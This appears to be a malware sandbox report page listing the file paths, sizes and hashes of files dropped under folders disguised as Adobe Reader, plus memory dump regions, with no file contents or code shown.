3d22d0bf5375f3cedc7f6bdc0b2fac8de834a1b80567a2395046c5aada74d87e8338fbd0f787b14dbe3f5914c9a751597f1332d89d19f6d96de195ef334cc915

Download Submit
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob9.vbs

Filesize
186B

MD5
09082253605a7171f078e26dc308a667

SHA1
585286c9fcda5e66e7fdb4e17a7bab6160183d46

SHA256
f4c67dc01ce4bf55e1b574009c49d481dad0d33070f53f42bc76807eb5e324ed

SHA512
adb4a1fec6feada14b8b4f28730e098a0af19f1e7c2fa0fe684030d1171e56c88813661a2352ce598221853fce3dc8a4bb3b2e1dc80b6471c41d2598f635b1d8

Download Submit
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobedc.vbs

Filesize
189B

MD5
ce8041824149d8266dbb0ad9688224d7

SHA1
3ab653c43ce66681ceaab90193e1a4c95d998090

SHA256
0a697bf8507b3f517afe7d67ed0f12f1a8d0edbb72252d75cc7677d6e2e638c5

SHA512
e1a205a1665fe5beb3c53cdcff4eb9c66a4773d730215ff87a179f3c825d342f8f7e8b5e65e45e6a1f13dfe7f58a09f5a920ce9416fe231d74ad1d99e60bd21d

Download Submit
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobeta.exe

Filesize
256KB

MD5
97b8dbcc7b3cc290aef4241df911ac2e

SHA1
733ababbcd278821d4e3ee78580841981f26642e

SHA256
c44ca1fe145c4f0dcea4efb95171cbf16dfec9fe66a603fbe29c94c21050a023

SHA512
4adaa7621e2c858e6541792146260142e1d28683ec1515a743a56bc106ab425edfce856ef3b0d146d63704b34694c9e666a39e3845a097d41cbf465537ec9b25

Download Submit
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\acro4.bat

Filesize
139B

MD5
89412aba215b6cd18b8a64c4485fa03f

SHA1
37089346499f54a7d89262a67d95c8764ab3ca1f

SHA256
9607fb2a0e2ea02cd674272680a238d21539071db3c9735818a1abf11ff30ff1

SHA512
7afe571b9ad4b67fdf00cecade8645e82471c1c5098b563a2e2d0cff96905f34b6071eb93c86f59850335e7e88d988d6c016553cdbbe1a693e1cdc3082a3790b

Download Submit
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\adbr01.exe

Filesize
2.4MB

MD5
9acfede263e82a5d2c3e433f65a034a9

SHA1
8eac20b714691232eebb777fd1b99d456201551a

SHA256
7705dcf5bc1484a398aab305e71e56ab9683f28b2c8e00c556bdefa21c25b15d

SHA512
5b61b43bd15fe2d53c9cb48e00d3d340e5866b349b686e1de813b01ec541bc7716105b0267a31c8d3b260cfc0b4d2e8896acdaba83b6bf7b5bfe11673a2bf3f1

Download Submit
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\adbr02.exe

Filesize
2.4MB

MD5
9091783550da66165530d1c5c90c1043

SHA1
5e1831a2fd9eaf331dec4895016ab5c1ebbd9443

SHA256
2bd538ee374c558e75d3e10f2051c42bde134ee7fe9539980ad7ab1147f9083e

SHA512
c0d6e54f6a4e8e2e9213ffe38582b86eb7abc83047d4f64b03c75aaadcc289a9bbc1ec1c0d3d10751053f6096039b2206c6e385465903695a68f0ae6fc6a55d4

Download Submit
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\rea01.bat

Filesize
1KB

MD5
ce7ccd3b48dbe8f34db3b2b1222e4fd9

SHA1
e25f9947c2b250c98dffd7bfeaca75b4db17dcfd

SHA256
6374a35588bd20362e54dff9e8cf0dffba5ba0ec5952a08fb51caea54c5d228e

SHA512
ee6b389f29d30a572c7c9837575df7ff197589824c5377f02b7c453572139d4ecc75c5b194a601b953fbb7e692b3929faf8c4e14e7fec51cd25d71658636ef99

Download Submit
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\011.011

Filesize
1KB

MD5
9494657198eb9f9e27ddb279cf5d45f6

SHA1
f0146baf6579d52467bbe5955fc102a4bc4cea82

SHA256
248bd5453a848cd3a9d97d1d1a4efe85e636a6c08da1db53b8c05e3c80ff9613

SHA512
1fb38c16b196bab47d790b263bad5ff7479c96769012eea2ad3cf9acc5866c9cb3bdb996fe700eee6ac2518a47a81fb8a2e8ce18dd58db10d1495cfcfc02f6f6

Download Submit
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\112.112

Filesize
400B

MD5
3c305699054489d4ba953729549294b8

SHA1
272b920622013b83dc073c26b75f5968663496c5

SHA256
52392e1693a81b409ab85297d0dc90dd360b0fd3ba022341499ab3f23add16d8

SHA512
7051b5a88aa709cf6496bddd82c91cc8d198390825c202ec34d1295e1070e62cf92566390dbd083b091a7c83d539d17751790e9cba569f4f566cd90de488000b

Download Submit
memory/1396-160-0x0000000000400000-0x0000000000709000-memory.dmp

Filesize
3.0MB

Download
memory/1396-129-0x0000000000400000-0x0000000000709000-memory.dmp

Filesize
3.0MB

Download
memory/1736-185-0x0000000000400000-0x000000000070C000-memory.dmp

Filesize
3.0MB

Download
memory/1736-192-0x00000000028A0000-0x0000000002AAC000-memory.dmp

Filesize
2.0MB

Download
memory/1736-171-0x0000000000400000-0x000000000070C000-memory.dmp

Filesize
3.0MB

Download
memory/1736-186-0x0000000000400000-0x000000000070C000-memory.dmp

Filesize
3.0MB

Download
memory/1736-187-0x0000000000400000-0x000000000070C000-memory.dmp

Filesize
3.0MB

Download
memory/1736-189-0x00000000028A0000-0x0000000002AAC000-memory.dmp

Filesize
2.0MB

Download
memory/1736-172-0x00000000028A0000-0x0000000002AAC000-memory.dmp

Filesize
2.0MB

Download
memory/1736-176-0x00000000028A0000-0x0000000002AAC000-memory.dmp

Filesize
2.0MB

Download
memory/1736-188-0x0000000000400000-0x000000000070C000-memory.dmp

Filesize
3.0MB

Download
memory/1736-197-0x00000000028A0000-0x0000000002AAC000-memory.dmp

Filesize
2.0MB

Download
memory/1752-167-0x0000000002450000-0x000000000275C000-memory.dmp

Filesize
3.0MB

Download
memory/1752-165-0x0000000002450000-0x000000000275C000-memory.dmp

Filesize
3.0MB

Download
memory/1752-206-0x0000000002450000-0x000000000275C000-memory.dmp

Filesize
3.0MB

Download
memory/1752-127-0x0000000002450000-0x0000000002759000-memory.dmp

Filesize
3.0MB

Download
memory/1752-126-0x0000000002450000-0x0000000002759000-memory.dmp

Filesize
3.0MB

Download
memory/2004-170-0x00000000024D0000-0x00000000027DC000-memory.dmp

Filesize
3.0MB

Download
memory/2004-168-0x0000000000400000-0x000000000070C000-memory.dmp

Filesize
3.0MB

Download
memory/2004-199-0x0000000000400000-0x000000000070C000-memory.dmp

Filesize
3.0MB

Download
memory/2388-146-0x0000000000400000-0x0000000000709000-memory.dmp

Filesize
3.0MB

Download
memory/2388-147-0x0000000002720000-0x000000000292C000-memory.dmp

Filesize
2.0MB

Download
memory/2388-145-0x0000000000400000-0x0000000000709000-memory.dmp

Filesize
3.0MB

Download
memory/2388-144-0x0000000000400000-0x0000000000709000-memory.dmp

Filesize
3.0MB

Download
memory/2388-143-0x0000000000400000-0x0000000000709000-memory.dmp

Filesize
3.0MB

Download
memory/2388-132-0x0000000002720000-0x000000000292C000-memory.dmp

Filesize
2.0MB

Download
memory/2388-136-0x0000000002720000-0x000000000292C000-memory.dmp

Filesize
2.0MB

Download
memory/2388-131-0x0000000000400000-0x0000000000709000-memory.dmp

Filesize
3.0MB

Download
memory/2388-150-0x0000000002720000-0x000000000292C000-memory.dmp

Filesize
2.0MB

Download
memory/2388-158-0x0000000002720000-0x000000000292C000-memory.dmp

Filesize
2.0MB

Download
memory/2624-74-0x0000000000190000-0x0000000000192000-memory.dmp

Filesize
8KB

Download
memory/2744-73-0x0000000000A90000-0x0000000000A92000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads